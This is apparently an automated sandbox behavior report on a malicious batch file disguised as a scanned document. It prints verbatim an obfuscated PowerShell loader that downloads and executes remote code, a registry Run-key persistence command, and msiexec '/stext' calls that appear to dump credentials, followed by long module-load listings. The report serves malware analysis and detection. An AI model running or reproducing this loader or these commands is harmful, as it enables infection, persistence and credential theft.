                Source: msiexec.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_16-32919
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKM_0001810-01-2024-GL-3762.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi NsttNon i O
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese i
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\tmzmicbwjbyewkukqymzvfa"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gjsxjnwrlsioiwwsrulujxhgmfcdr"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi NsttNon i OJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\tmzmicbwjbyewkukqymzvfa"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gjsxjnwrlsioiwwsrulujxhgmfcdr"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
